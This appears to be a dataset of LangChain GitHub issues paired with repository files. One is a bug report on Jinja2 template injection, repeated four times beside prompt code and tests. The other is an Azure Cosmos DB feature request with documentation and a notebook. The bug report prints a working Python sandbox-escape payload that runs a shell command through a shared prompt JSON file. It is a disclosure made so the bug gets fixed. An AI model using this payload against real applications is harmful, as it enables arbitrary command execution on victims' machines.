https://github.com/langchain-ai/langchain
4,394
Template injection to arbitrary code execution
### System Info windows 11 ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [X] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction 1. save the following data to pt.json ```json { "input_variables": [ "prompt" ], "output_parser": null, "partial_variables": {}, "template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}", "template_format": "jinja2", "validate_template": true, "_type": "prompt" } ``` 2. run ```python from langchain.prompts import load_prompt loaded_prompt = load_prompt("pt.json") loaded_prompt.format(history="", prompt="What is 1 + 1?") ``` 3. the `dir` command will be execute attack scene: Alice can send prompt file to Bob and let Bob to load it. analysis: Jinja2 is used to concat prompts. Template injection will happened note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment. ### Expected behavior code should not be execute
https://github.com/langchain-ai/langchain/issues/4394
https://github.com/langchain-ai/langchain/pull/10252
b642d00f9f625969ca1621676990af7db4271a2e
22abeb9f6cc555591bf8e92b5e328e43aa07ff6c
"2023-05-09T12:28:24Z"
python
"2023-10-10T15:15:42Z"
libs/langchain/langchain/prompts/prompt.py
"""Prompt schema definition.""" from __future__ import annotations from pathlib import Path from string import Formatter from typing import Any, Dict, List, Optional, Union from langchain.prompts.base import ( DEFAULT_FORMATTER_MAPPING, StringPromptTemplate, _get_jinja2_variables_from_template, check_valid_template, ) from langchain.pydantic_v1 import root_validator class PromptTemplate(StringPromptTemplate): """A prompt template for a language model. A prompt template consists of a string template. It accepts a set of parameters from the user that can be used to generate a prompt for a language model. The template can be formatted using either f-strings (default) or jinja2 syntax. Example: .. code-block:: python from langchain.prompts import PromptTemplate # Instantiation using from_template (recommended) prompt = PromptTemplate.from_template("Say {foo}") prompt.format(foo="bar") # Instantiation using initializer prompt = PromptTemplate(input_variables=["foo"], template="Say {foo}") """ @property def lc_attributes(self) -> Dict[str, Any]: return { "template_format": self.template_format, } input_variables: List[str] """A list of the names of the variables the prompt template expects.""" template: str """The prompt template.""" template_format: str = "f-string" """The format of the prompt template. Options are: 'f-string', 'jinja2'.""" validate_template: bool = True """Whether or not to try validating the template.""" def __add__(self, other: Any) -> PromptTemplate: """Override the + operator to allow for combining prompt templates.""" # Allow for easy combining if isinstance(other, PromptTemplate): if self.template_format != "f-string": raise ValueError( "Adding prompt templates only supported for f-strings." ) if other.template_format != "f-string": raise ValueError( "Adding prompt templates only supported for f-strings." ) input_variables = list( set(self.input_variables) | set(other.input_variables) ) template = self.template + other.template # If any do not want to validate, then don't validate_template = self.validate_template and other.validate_template partial_variables = {k: v for k, v in self.partial_variables.items()} for k, v in other.partial_variables.items(): if k in partial_variables: raise ValueError("Cannot have same variable partialed twice.") else: partial_variables[k] = v return PromptTemplate( template=template, input_variables=input_variables, partial_variables=partial_variables, template_format="f-string", validate_template=validate_template, ) elif isinstance(other, str): prompt = PromptTemplate.from_template(other) return self + prompt else: raise NotImplementedError(f"Unsupported operand type for +: {type(other)}") @property def _prompt_type(self) -> str: """Return the prompt type key.""" return "prompt" def format(self, **kwargs: Any) -> str: """Format the prompt with the inputs. Args: kwargs: Any arguments to be passed to the prompt template. Returns: A formatted string. Example: .. code-block:: python prompt.format(variable1="foo") """ kwargs = self._merge_partial_and_user_variables(**kwargs) return DEFAULT_FORMATTER_MAPPING[self.template_format](self.template, **kwargs) @root_validator() def template_is_valid(cls, values: Dict) -> Dict: """Check that template and input variables are consistent.""" if values["validate_template"]: all_inputs = values["input_variables"] + list(values["partial_variables"]) check_valid_template( values["template"], values["template_format"], all_inputs ) return values @classmethod def from_examples( cls, examples: List[str], suffix: str, input_variables: List[str], example_separator: str = "\n\n", prefix: str = "", **kwargs: Any, ) -> PromptTemplate: """Take examples in list format with prefix and suffix to create a prompt. Intended to be used as a way to dynamically create a prompt from examples. Args: examples: List of examples to use in the prompt. suffix: String to go after the list of examples. Should generally set up the user's input. input_variables: A list of variable names the final prompt template will expect. example_separator: The separator to use in between examples. Defaults to two new line characters. prefix: String that should go before any examples. Generally includes examples. Default to an empty string. Returns: The final prompt generated. """ template = example_separator.join([prefix, *examples, suffix]) return cls(input_variables=input_variables, template=template, **kwargs) @classmethod def from_file( cls, template_file: Union[str, Path], input_variables: List[str], **kwargs: Any ) -> PromptTemplate: """Load a prompt from a file. Args: template_file: The path to the file containing the prompt template. input_variables: A list of variable names the final prompt template will expect. Returns: The prompt loaded from the file. """ with open(str(template_file), "r") as f: template = f.read() return cls(input_variables=input_variables, template=template, **kwargs) @classmethod def from_template( cls, template: str, *, template_format: str = "f-string", partial_variables: Optional[Dict[str, Any]] = None, **kwargs: Any, ) -> PromptTemplate: """Load a prompt template from a template. Args: template: The template to load. template_format: The format of the template. Use `jinja2` for jinja2, and `f-string` or None for f-strings. partial_variables: A dictionary of variables that can be used to partially fill in the template. For example, if the template is `"{variable1} {variable2}"`, and `partial_variables` is `{"variable1": "foo"}`, then the final prompt will be `"foo {variable2}"`. Returns: The prompt template loaded from the template. """ if template_format == "jinja2": # Get the variables for the template input_variables = _get_jinja2_variables_from_template(template) elif template_format == "f-string": input_variables = { v for _, v, _, _ in Formatter().parse(template) if v is not None } else: raise ValueError(f"Unsupported template format: {template_format}") _partial_variables = partial_variables or {} if _partial_variables: input_variables = { var for var in input_variables if var not in _partial_variables } return cls( input_variables=sorted(input_variables), template=template, template_format=template_format, partial_variables=_partial_variables, **kwargs, ) # For backwards compatibility. Prompt = PromptTemplate
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
4,394
Template injection to arbitrary code execution
### System Info windows 11 ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [X] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction 1. save the following data to pt.json ```json { "input_variables": [ "prompt" ], "output_parser": null, "partial_variables": {}, "template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}", "template_format": "jinja2", "validate_template": true, "_type": "prompt" } ``` 2. run ```python from langchain.prompts import load_prompt loaded_prompt = load_prompt("pt.json") loaded_prompt.format(history="", prompt="What is 1 + 1?") ``` 3. the `dir` command will be execute attack scene: Alice can send prompt file to Bob and let Bob to load it. analysis: Jinja2 is used to concat prompts. Template injection will happened note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment. ### Expected behavior code should not be execute
https://github.com/langchain-ai/langchain/issues/4394
https://github.com/langchain-ai/langchain/pull/10252
b642d00f9f625969ca1621676990af7db4271a2e
22abeb9f6cc555591bf8e92b5e328e43aa07ff6c
"2023-05-09T12:28:24Z"
python
"2023-10-10T15:15:42Z"
libs/langchain/tests/unit_tests/examples/jinja_injection_prompt.json
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
4,394
Template injection to arbitrary code execution
### System Info windows 11 ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [X] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction 1. save the following data to pt.json ```json { "input_variables": [ "prompt" ], "output_parser": null, "partial_variables": {}, "template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}", "template_format": "jinja2", "validate_template": true, "_type": "prompt" } ``` 2. run ```python from langchain.prompts import load_prompt loaded_prompt = load_prompt("pt.json") loaded_prompt.format(history="", prompt="What is 1 + 1?") ``` 3. the `dir` command will be execute attack scene: Alice can send prompt file to Bob and let Bob to load it. analysis: Jinja2 is used to concat prompts. Template injection will happened note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment. ### Expected behavior code should not be execute
https://github.com/langchain-ai/langchain/issues/4394
https://github.com/langchain-ai/langchain/pull/10252
b642d00f9f625969ca1621676990af7db4271a2e
22abeb9f6cc555591bf8e92b5e328e43aa07ff6c
"2023-05-09T12:28:24Z"
python
"2023-10-10T15:15:42Z"
libs/langchain/tests/unit_tests/examples/jinja_injection_prompt.yaml
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
4,394
Template injection to arbitrary code execution
### System Info windows 11 ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [X] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction 1. save the following data to pt.json ```json { "input_variables": [ "prompt" ], "output_parser": null, "partial_variables": {}, "template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}", "template_format": "jinja2", "validate_template": true, "_type": "prompt" } ``` 2. run ```python from langchain.prompts import load_prompt loaded_prompt = load_prompt("pt.json") loaded_prompt.format(history="", prompt="What is 1 + 1?") ``` 3. the `dir` command will be execute attack scene: Alice can send prompt file to Bob and let Bob to load it. analysis: Jinja2 is used to concat prompts. Template injection will happened note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment. ### Expected behavior code should not be execute
https://github.com/langchain-ai/langchain/issues/4394
https://github.com/langchain-ai/langchain/pull/10252
b642d00f9f625969ca1621676990af7db4271a2e
22abeb9f6cc555591bf8e92b5e328e43aa07ff6c
"2023-05-09T12:28:24Z"
python
"2023-10-10T15:15:42Z"
libs/langchain/tests/unit_tests/prompts/test_loading.py
"""Test loading functionality.""" import os from contextlib import contextmanager from pathlib import Path from typing import Iterator from langchain.output_parsers import RegexParser from langchain.prompts.few_shot import FewShotPromptTemplate from langchain.prompts.loading import load_prompt from langchain.prompts.prompt import PromptTemplate EXAMPLE_DIR = Path("tests/unit_tests/examples").absolute() @contextmanager def change_directory(dir: Path) -> Iterator: """Change the working directory to the right folder.""" origin = Path().absolute() try: os.chdir(dir) yield finally: os.chdir(origin) def test_loading_from_YAML() -> None: """Test loading from yaml file.""" prompt = load_prompt(EXAMPLE_DIR / "simple_prompt.yaml") expected_prompt = PromptTemplate( input_variables=["adjective", "content"], template="Tell me a {adjective} joke about {content}.", ) assert prompt == expected_prompt def test_loading_from_JSON() -> None: """Test loading from json file.""" prompt = load_prompt(EXAMPLE_DIR / "simple_prompt.json") expected_prompt = PromptTemplate( input_variables=["adjective", "content"], template="Tell me a {adjective} joke about {content}.", ) assert prompt == expected_prompt def test_saving_loading_round_trip(tmp_path: Path) -> None: """Test equality when saving and loading a prompt.""" simple_prompt = PromptTemplate( input_variables=["adjective", "content"], template="Tell me a {adjective} joke about {content}.", ) simple_prompt.save(file_path=tmp_path / "prompt.yaml") loaded_prompt = load_prompt(tmp_path / "prompt.yaml") assert loaded_prompt == simple_prompt few_shot_prompt = FewShotPromptTemplate( input_variables=["adjective"], prefix="Write antonyms for the following words.", example_prompt=PromptTemplate( input_variables=["input", "output"], template="Input: {input}\nOutput: {output}", ), examples=[ {"input": "happy", "output": "sad"}, {"input": "tall", "output": "short"}, ], suffix="Input: {adjective}\nOutput:", ) few_shot_prompt.save(file_path=tmp_path / "few_shot.yaml") loaded_prompt = load_prompt(tmp_path / "few_shot.yaml") assert loaded_prompt == few_shot_prompt def test_loading_with_template_as_file() -> None: """Test loading when the template is a file.""" with change_directory(EXAMPLE_DIR): prompt = load_prompt("simple_prompt_with_template_file.json") expected_prompt = PromptTemplate( input_variables=["adjective", "content"], template="Tell me a {adjective} joke about {content}.", ) assert prompt == expected_prompt def test_loading_few_shot_prompt_from_yaml() -> None: """Test loading few shot prompt from yaml.""" with change_directory(EXAMPLE_DIR): prompt = load_prompt("few_shot_prompt.yaml") expected_prompt = FewShotPromptTemplate( input_variables=["adjective"], prefix="Write antonyms for the following words.", example_prompt=PromptTemplate( input_variables=["input", "output"], template="Input: {input}\nOutput: {output}", ), examples=[ {"input": "happy", "output": "sad"}, {"input": "tall", "output": "short"}, ], suffix="Input: {adjective}\nOutput:", ) assert prompt == expected_prompt def test_loading_few_shot_prompt_from_json() -> None: """Test loading few shot prompt from json.""" with change_directory(EXAMPLE_DIR): prompt = load_prompt("few_shot_prompt.json") expected_prompt = FewShotPromptTemplate( input_variables=["adjective"], prefix="Write antonyms for the following words.", example_prompt=PromptTemplate( input_variables=["input", "output"], template="Input: {input}\nOutput: {output}", ), examples=[ {"input": "happy", "output": "sad"}, {"input": "tall", "output": "short"}, ], suffix="Input: {adjective}\nOutput:", ) assert prompt == expected_prompt def test_loading_few_shot_prompt_when_examples_in_config() -> None: """Test loading few shot prompt when the examples are in the config.""" with change_directory(EXAMPLE_DIR): prompt = load_prompt("few_shot_prompt_examples_in.json") expected_prompt = FewShotPromptTemplate( input_variables=["adjective"], prefix="Write antonyms for the following words.", example_prompt=PromptTemplate( input_variables=["input", "output"], template="Input: {input}\nOutput: {output}", ), examples=[ {"input": "happy", "output": "sad"}, {"input": "tall", "output": "short"}, ], suffix="Input: {adjective}\nOutput:", ) assert prompt == expected_prompt def test_loading_few_shot_prompt_example_prompt() -> None: """Test loading few shot when the example prompt is in its own file.""" with change_directory(EXAMPLE_DIR): prompt = load_prompt("few_shot_prompt_example_prompt.json") expected_prompt = FewShotPromptTemplate( input_variables=["adjective"], prefix="Write antonyms for the following words.", example_prompt=PromptTemplate( input_variables=["input", "output"], template="Input: {input}\nOutput: {output}", ), examples=[ {"input": "happy", "output": "sad"}, {"input": "tall", "output": "short"}, ], suffix="Input: {adjective}\nOutput:", ) assert prompt == expected_prompt def test_loading_with_output_parser() -> None: with change_directory(EXAMPLE_DIR): prompt = load_prompt("prompt_with_output_parser.json") expected_template = "Given the following question and student answer, provide a correct answer and score the student answer.\nQuestion: {question}\nStudent Answer: {student_answer}\nCorrect Answer:" # noqa: E501 expected_prompt = PromptTemplate( input_variables=["question", "student_answer"], output_parser=RegexParser( regex="(.*?)\nScore: (.*)", output_keys=["answer", "score"], ), template=expected_template, ) assert prompt == expected_prompt
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
11,627
Add AzureCosmosDBVectorSearch VectorStore
### Feature request ### Feature request Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high dimensional vector data stored directly in Azure Cosmos DB for MongoDB vCore. It contains similarity measures such as COS (cosine distance), L2 (Euclidean distance) or IP (inner product) which measures the distance between the data vectors and your query vector. The data vectors that are closest to your query vector are the ones that are found to be most similar semantically and retrieved during query time. The accompanying PR would add support for Langchain Python users to store vectors from document embeddings generated from APIs such as Azure OpenAI Embeddings or Hugging Face on Azure. [Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search) ### Motivation This capability described in the feature request is currently not available for Langchain Python. ### Your contribution I will be submitting a PR for this feature request.
https://github.com/langchain-ai/langchain/issues/11627
https://github.com/langchain-ai/langchain/pull/11632
28ee6a7c125f1eb209b6b6428d1a50040408ea9f
d0603c86b6dc559799c64033d330075a8744435e
"2023-10-10T20:55:53Z"
python
"2023-10-11T20:56:46Z"
docs/docs/integrations/platforms/microsoft.mdx
# Microsoft All functionality related to Microsoft ## LLM ### Azure OpenAI >[Microsoft Azure](https://en.wikipedia.org/wiki/Microsoft_Azure), often referred to as `Azure` is a cloud computing platform run by `Microsoft`, which offers access, management, and development of applications and services through global data centers. It provides a range of capabilities, including software as a service (SaaS), platform as a service (PaaS), and infrastructure as a service (IaaS). `Microsoft Azure` supports many programming languages, tools, and frameworks, including Microsoft-specific and third-party software and systems. >[Azure OpenAI](https://learn.microsoft.com/en-us/azure/cognitive-services/openai/) is an `Azure` service with powerful language models from `OpenAI` including the `GPT-3`, `Codex` and `Embeddings model` series for content generation, summarization, semantic search, and natural language to code translation. ```bash pip install openai tiktoken ``` Set the environment variables to get access to the `Azure OpenAI` service. ```python import os os.environ["OPENAI_API_TYPE"] = "azure" os.environ["OPENAI_API_BASE"] = "https://<your-endpoint.openai.azure.com/" os.environ["OPENAI_API_KEY"] = "your AzureOpenAI key" os.environ["OPENAI_API_VERSION"] = "2023-05-15" ``` See a [usage example](/docs/integrations/llms/azure_openai_example). ```python from langchain.llms import AzureOpenAI ``` ## Text Embedding Models ### Azure OpenAI See a [usage example](/docs/integrations/text_embedding/azureopenai) ```python from langchain.embeddings import OpenAIEmbeddings ``` ## Chat Models ### Azure OpenAI See a [usage example](/docs/integrations/chat/azure_chat_openai) ```python from langchain.chat_models import AzureChatOpenAI ``` ## Document loaders ### Azure Blob Storage >[Azure Blob Storage](https://learn.microsoft.com/en-us/azure/storage/blobs/storage-blobs-introduction) is Microsoft's object storage solution for the cloud. Blob Storage is optimized for storing massive amounts of unstructured data. Unstructured data is data that doesn't adhere to a particular data model or definition, such as text or binary data. >[Azure Files](https://learn.microsoft.com/en-us/azure/storage/files/storage-files-introduction) offers fully managed > file shares in the cloud that are accessible via the industry standard Server Message Block (`SMB`) protocol, > Network File System (`NFS`) protocol, and `Azure Files REST API`. `Azure Files` are based on the `Azure Blob Storage`. `Azure Blob Storage` is designed for: - Serving images or documents directly to a browser. - Storing files for distributed access. - Streaming video and audio. - Writing to log files. - Storing data for backup and restore, disaster recovery, and archiving. - Storing data for analysis by an on-premises or Azure-hosted service. ```bash pip install azure-storage-blob ``` See a [usage example for the Azure Blob Storage](/docs/integrations/document_loaders/azure_blob_storage_container.html). ```python from langchain.document_loaders import AzureBlobStorageContainerLoader ``` See a [usage example for the Azure Files](/docs/integrations/document_loaders/azure_blob_storage_file.html). ```python from langchain.document_loaders import AzureBlobStorageFileLoader ``` ### Microsoft OneDrive >[Microsoft OneDrive](https://en.wikipedia.org/wiki/OneDrive) (formerly `SkyDrive`) is a file-hosting service operated by Microsoft. First, you need to install a python package. ```bash pip install o365 ``` See a [usage example](/docs/integrations/document_loaders/microsoft_onedrive). ```python from langchain.document_loaders import OneDriveLoader ``` ### Microsoft Word >[Microsoft Word](https://www.microsoft.com/en-us/microsoft-365/word) is a word processor developed by Microsoft. See a [usage example](/docs/integrations/document_loaders/microsoft_word). ```python from langchain.document_loaders import UnstructuredWordDocumentLoader ``` ## Retriever ### Azure Cognitive Search >[Azure Cognitive Search](https://learn.microsoft.com/en-us/azure/search/search-what-is-azure-search) (formerly known as `Azure Search`) is a cloud search service that gives developers infrastructure, APIs, and tools for building a rich search experience over private, heterogeneous content in web, mobile, and enterprise applications. >Search is foundational to any app that surfaces text to users, where common scenarios include catalog or document search, online retail apps, or data exploration over proprietary content. When you create a search service, you'll work with the following capabilities: >- A search engine for full text search over a search index containing user-owned content >- Rich indexing, with lexical analysis and optional AI enrichment for content extraction and transformation >- Rich query syntax for text search, fuzzy search, autocomplete, geo-search and more >- Programmability through REST APIs and client libraries in Azure SDKs >- Azure integration at the data layer, machine learning layer, and AI (Cognitive Services) See [set up instructions](https://learn.microsoft.com/en-us/azure/search/search-create-service-portal). See a [usage example](/docs/integrations/retrievers/azure_cognitive_search). ```python from langchain.retrievers import AzureCognitiveSearchRetriever ```
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
11,627
Add AzureCosmosDBVectorSearch VectorStore
### Feature request ### Feature request Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high dimensional vector data stored directly in Azure Cosmos DB for MongoDB vCore. It contains similarity measures such as COS (cosine distance), L2 (Euclidean distance) or IP (inner product) which measures the distance between the data vectors and your query vector. The data vectors that are closest to your query vector are the ones that are found to be most similar semantically and retrieved during query time. The accompanying PR would add support for Langchain Python users to store vectors from document embeddings generated from APIs such as Azure OpenAI Embeddings or Hugging Face on Azure. [Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search) ### Motivation This capability described in the feature request is currently not available for Langchain Python. ### Your contribution I will be submitting a PR for this feature request.
https://github.com/langchain-ai/langchain/issues/11627
https://github.com/langchain-ai/langchain/pull/11632
28ee6a7c125f1eb209b6b6428d1a50040408ea9f
d0603c86b6dc559799c64033d330075a8744435e
"2023-10-10T20:55:53Z"
python
"2023-10-11T20:56:46Z"
docs/docs/integrations/vectorstores/azure_cosmos_db.ipynb
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
11,627
Add AzureCosmosDBVectorSearch VectorStore
### Feature request ### Feature request Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high dimensional vector data stored directly in Azure Cosmos DB for MongoDB vCore. It contains similarity measures such as COS (cosine distance), L2 (Euclidean distance) or IP (inner product) which measures the distance between the data vectors and your query vector. The data vectors that are closest to your query vector are the ones that are found to be most similar semantically and retrieved during query time. The accompanying PR would add support for Langchain Python users to store vectors from document embeddings generated from APIs such as Azure OpenAI Embeddings or Hugging Face on Azure. [Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search) ### Motivation This capability described in the feature request is currently not available for Langchain Python. ### Your contribution I will be submitting a PR for this feature request.
https://github.com/langchain-ai/langchain/issues/11627
https://github.com/langchain-ai/langchain/pull/11632
28ee6a7c125f1eb209b6b6428d1a50040408ea9f
d0603c86b6dc559799c64033d330075a8744435e
"2023-10-10T20:55:53Z"
python
"2023-10-11T20:56:46Z"
docs/docs/integrations/vectorstores/azuresearch.ipynb
{ "cells": [ { "cell_type": "markdown", "metadata": {}, "source": [ "# Azure Cognitive Search\n", "\n", "[Azure Cognitive Search](https://learn.microsoft.com/azure/search/search-what-is-azure-search) (formerly known as `Azure Search`) is a cloud search service that gives developers infrastructure, APIs, and tools for building a rich search experience over private, heterogeneous content in web, mobile, and enterprise applications.\n", "\n", "Vector search is currently in public preview. It's available through the Azure portal, preview REST API and beta client libraries. [More info](https://learn.microsoft.com/en-us/azure/search/vector-search-overview) Beta client libraries are subject to potential breaking changes, please be sure to use the SDK package version identified below. azure-search-documents==11.4.0b8" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "# Install Azure Cognitive Search SDK" ] }, { "cell_type": "code", "execution_count": null, "metadata": {}, "outputs": [], "source": [ "!pip install azure-search-documents==11.4.0b8\n", "!pip install azure-identity" ] }, { "attachments": {}, "cell_type": "markdown", "metadata": {}, "source": [ "## Import required libraries" ] }, { "cell_type": "code", "execution_count": 1, "metadata": {}, "outputs": [], "source": [ "import openai\n", "import os\n", "from langchain.embeddings import OpenAIEmbeddings\n", "from langchain.vectorstores.azuresearch import AzureSearch" ] }, { "attachments": {}, "cell_type": "markdown", "metadata": {}, "source": [ "## Configure OpenAI settings\n", "Configure the OpenAI settings to use Azure OpenAI or OpenAI" ] }, { "cell_type": "code", "execution_count": 2, "metadata": {}, "outputs": [], "source": [ "os.environ[\"OPENAI_API_TYPE\"] = \"azure\"\n", "os.environ[\"OPENAI_API_BASE\"] = \"YOUR_OPENAI_ENDPOINT\"\n", "os.environ[\"OPENAI_API_KEY\"] = \"YOUR_OPENAI_API_KEY\"\n", "os.environ[\"OPENAI_API_VERSION\"] = \"2023-05-15\"\n", "model: str = \"text-embedding-ada-002\"" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Configure vector store settings\n", " \n", "Set up the vector store settings using environment variables:" ] }, { "cell_type": "code", "execution_count": 3, "metadata": {}, "outputs": [], "source": [ "vector_store_address: str = \"YOUR_AZURE_SEARCH_ENDPOINT\"\n", "vector_store_password: str = \"YOUR_AZURE_SEARCH_ADMIN_KEY\"" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Create embeddings and vector store instances\n", " \n", "Create instances of the OpenAIEmbeddings and AzureSearch classes:" ] }, { "cell_type": "code", "execution_count": 4, "metadata": {}, "outputs": [], "source": [ "embeddings: OpenAIEmbeddings = OpenAIEmbeddings(deployment=model, chunk_size=1)\n", "index_name: str = \"langchain-vector-demo\"\n", "vector_store: AzureSearch = AzureSearch(\n", " azure_search_endpoint=vector_store_address,\n", " azure_search_key=vector_store_password,\n", " index_name=index_name,\n", " embedding_function=embeddings.embed_query,\n", ")" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Insert text and embeddings into vector store\n", " \n", "Add texts and metadata from the JSON data to the vector store:" ] }, { "cell_type": "code", "execution_count": null, "metadata": {}, "outputs": [], "source": [ "from langchain.document_loaders import TextLoader\n", "from langchain.text_splitter import CharacterTextSplitter\n", "\n", "loader = TextLoader(\"../../../state_of_the_union.txt\", encoding=\"utf-8\")\n", "\n", "documents = loader.load()\n", "text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)\n", "docs = text_splitter.split_documents(documents)\n", "\n", "vector_store.add_documents(documents=docs)" ] }, { "attachments": {}, "cell_type": "markdown", "metadata": {}, "source": [ "## Perform a vector similarity search\n", " \n", "Execute a pure vector similarity search using the similarity_search() method:" ] }, { "cell_type": "code", "execution_count": 5, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "Tonight. I call on the Senate to: Pass the Freedom to Vote Act. Pass the John Lewis Voting Rights Act. And while you’re at it, pass the Disclose Act so Americans can know who is funding our elections. \n", "\n", "Tonight, I’d like to honor someone who has dedicated his life to serve this country: Justice Stephen Breyer—an Army veteran, Constitutional scholar, and retiring Justice of the United States Supreme Court. Justice Breyer, thank you for your service. \n", "\n", "One of the most serious constitutional responsibilities a President has is nominating someone to serve on the United States Supreme Court. \n", "\n", "And I did that 4 days ago, when I nominated Circuit Court of Appeals Judge Ketanji Brown Jackson. One of our nation’s top legal minds, who will continue Justice Breyer’s legacy of excellence.\n" ] } ], "source": [ "# Perform a similarity search\n", "docs = vector_store.similarity_search(\n", " query=\"What did the president say about Ketanji Brown Jackson\",\n", " k=3,\n", " search_type=\"similarity\",\n", ")\n", "print(docs[0].page_content)" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Perform a vector similarity search with relevance scores\n", " \n", "Execute a pure vector similarity search using the similarity_search_with_relevance_scores() method:" ] }, { "cell_type": "code", "execution_count": 12, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "[(Document(page_content='Tonight. I call on the Senate to: Pass the Freedom to Vote Act. Pass the John Lewis Voting Rights Act. And while you’re at it, pass the Disclose Act so Americans can know who is funding our elections. \\n\\nTonight, I’d like to honor someone who has dedicated his life to serve this country: Justice Stephen Breyer—an Army veteran, Constitutional scholar, and retiring Justice of the United States Supreme Court. Justice Breyer, thank you for your service. \\n\\nOne of the most serious constitutional responsibilities a President has is nominating someone to serve on the United States Supreme Court. \\n\\nAnd I did that 4 days ago, when I nominated Circuit Court of Appeals Judge Ketanji Brown Jackson. One of our nation’s top legal minds, who will continue Justice Breyer’s legacy of excellence.', metadata={'source': 'C:\\\\repos\\\\langchain-fruocco-acs\\\\langchain\\\\docs\\\\extras\\\\modules\\\\state_of_the_union.txt'}),\n", " 0.8441472),\n", " (Document(page_content='Tonight. I call on the Senate to: Pass the Freedom to Vote Act. Pass the John Lewis Voting Rights Act. And while you’re at it, pass the Disclose Act so Americans can know who is funding our elections. \\n\\nTonight, I’d like to honor someone who has dedicated his life to serve this country: Justice Stephen Breyer—an Army veteran, Constitutional scholar, and retiring Justice of the United States Supreme Court. Justice Breyer, thank you for your service. \\n\\nOne of the most serious constitutional responsibilities a President has is nominating someone to serve on the United States Supreme Court. \\n\\nAnd I did that 4 days ago, when I nominated Circuit Court of Appeals Judge Ketanji Brown Jackson. One of our nation’s top legal minds, who will continue Justice Breyer’s legacy of excellence.', metadata={'source': 'C:\\\\repos\\\\langchain-fruocco-acs\\\\langchain\\\\docs\\\\extras\\\\modules\\\\state_of_the_union.txt'}),\n", " 0.8441472),\n", " (Document(page_content='A former top litigator in private practice. A former federal public defender. And from a family of public school educators and police officers. A consensus builder. Since she’s been nominated, she’s received a broad range of support—from the Fraternal Order of Police to former judges appointed by Democrats and Republicans. \\n\\nAnd if we are to advance liberty and justice, we need to secure the Border and fix the immigration system. \\n\\nWe can do both. At our border, we’ve installed new technology like cutting-edge scanners to better detect drug smuggling. \\n\\nWe’ve set up joint patrols with Mexico and Guatemala to catch more human traffickers. \\n\\nWe’re putting in place dedicated immigration judges so families fleeing persecution and violence can have their cases heard faster. \\n\\nWe’re securing commitments and supporting partners in South and Central America to host more refugees and secure their own borders.', metadata={'source': 'C:\\\\repos\\\\langchain-fruocco-acs\\\\langchain\\\\docs\\\\extras\\\\modules\\\\state_of_the_union.txt'}),\n", " 0.82153815),\n", " (Document(page_content='A former top litigator in private practice. A former federal public defender. And from a family of public school educators and police officers. A consensus builder. Since she’s been nominated, she’s received a broad range of support—from the Fraternal Order of Police to former judges appointed by Democrats and Republicans. \\n\\nAnd if we are to advance liberty and justice, we need to secure the Border and fix the immigration system. \\n\\nWe can do both. At our border, we’ve installed new technology like cutting-edge scanners to better detect drug smuggling. \\n\\nWe’ve set up joint patrols with Mexico and Guatemala to catch more human traffickers. \\n\\nWe’re putting in place dedicated immigration judges so families fleeing persecution and violence can have their cases heard faster. \\n\\nWe’re securing commitments and supporting partners in South and 